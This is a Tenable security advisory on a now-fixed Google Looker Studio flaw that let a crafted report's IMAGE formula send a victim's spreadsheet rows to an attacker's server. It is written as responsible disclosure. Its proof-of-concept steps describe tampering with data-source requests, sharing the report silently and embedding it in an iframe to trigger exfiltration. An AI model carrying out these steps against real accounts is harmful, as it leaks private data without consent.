Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

Google Cloud Platform (GCP) Cross-Tenant Data Sources Leak With Image Rendering in Looker Studio

High

Synopsis

Tenable Research has identified and responsibly disclosed a vulnerability in Google's Looker Studio. The vulnerability allowed an attacker to leak sensitive data from a victim's data source through image rendering.

This vulnerability exploited a combination of features within Looker Studio. An attacker could create a malicious report and attach a victim's data source, such as a Google Sheet, using "Viewer's credentials." By then adding a calculated field to a table within the report, the attacker could craft a formula that used the IMAGE function. This function was configured to load an image from an external, attacker-controlled server and append the victim's data to the image's URL as a query string.

When the victim accessed the report, their browser would attempt to load the images from the attacker's server, inadvertently sending the victim's sensitive data along with the request. The attacker could then log these requests on their server, effectively exfiltrating the victim's data row by row. A single click by the victim on the malicious report or the attacker’s website was sufficient to trigger the exploit and compromise their data.

Proof of Concept:

Set up a mock data source for the getColumns HTTP request:

  1. Create a Google Sheet spreadsheet, for example, we will name it “Attacker’s spreadsheet.”
  2. Populate all columns from A-Z with random data.

 

Set up the attacker’s report:

  1. Create a report.
  2. Choose a connector, for example, Google Sheets.
  3. Choose the specific data source we just created, “Attacker’s spreadsheet.”
  4. Remove the check from the checkbox “Use first row as headers” so you can reference columns by A-Z.

Screenshot showing the report configuration

  1. Proxy the HTTP requests, and forward the requests, including the getColumns request.
  2. Intercept the createBlockDatasource and publishDatasource HTTP requests, and change the id of the sheet from the attacker’s to the victim’s sheet.
  3. Click Resource → Manage added data sources → edit the added Google Sheet data source, and change the credentials to Viewer Credentials.

Screenshot showing the use of "Viewer's Credentials"

  1. Add a chart to the report, preferably a table, by pressing “Add a chart” and choosing a Table.
  2. Choose the victim’s data source to be attached to the table chart, the end result should be “No Data Set Access.”
  3. Add a calculated field by pressing the table → “Add dimension” → “Add calculated field” and paste the formula attached to this report. Kindly insert your domain (the attacker) in the placeholder.

Screenshot showing the entered formula

 

  1. Share the report with the victim, and uncheck the “Notify” checkbox.
  2. (Optional) Make the report embeddable by clicking File → Embed report → check “Enable Embedding” and press Done.
  3. (Optional) Host a website and iframe the report with the granted iframe when allowing embedding, for example:
<iframe width="600" height="450" src="Looker Studio Overview <attacker’s-report-id>/page/MK5LF" frameborder="0" style="border:0" allowfullscreen sandbox="allow-storage-access-by-user-activation allow-scripts allow-same-origin allow-popups allow-popups-to-escape-sandbox"></iframe>
  1. Visit the attacker’s site as the victim, and the data will be exfiltrated.

Solution

Google has remediated the issue.

Disclosure Timeline

June 3, 2025 - Tenable reports the finding to Google, Google acknowledges
June 14, 2025 - Google assigns S1 severity
July 2, 2025 - Tenable asks for updates on this issue
July 15, 2025 - Tenable asks for updates
Jul 17, 2025 - Google updates that the product team is working to resolve the issue
July 28, 2025 - Google updates that the bug is fixed, but not yet verified
July 31, 2025 - Tenable agreed to delay the disclosure date
August 02, 2025 - Google updates that the bug is fixed and verified
August 11, 2025 - Google updates that the fix is in production and asks to let them know when we disclose
August 28, 2025 - Google asks to see the TRA draft, and Tenable shares it with them
August 28, 2025 - Tenable delays the publication due to holidays to September 3rd

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Risk Information

Tenable Advisory ID: TRA-2025-30
Credit:
Liv Matan
Affected Products:
GCP Looker Studio
Risk Factor:
High

Advisory Timeline

September 3, 2025 - Initial release.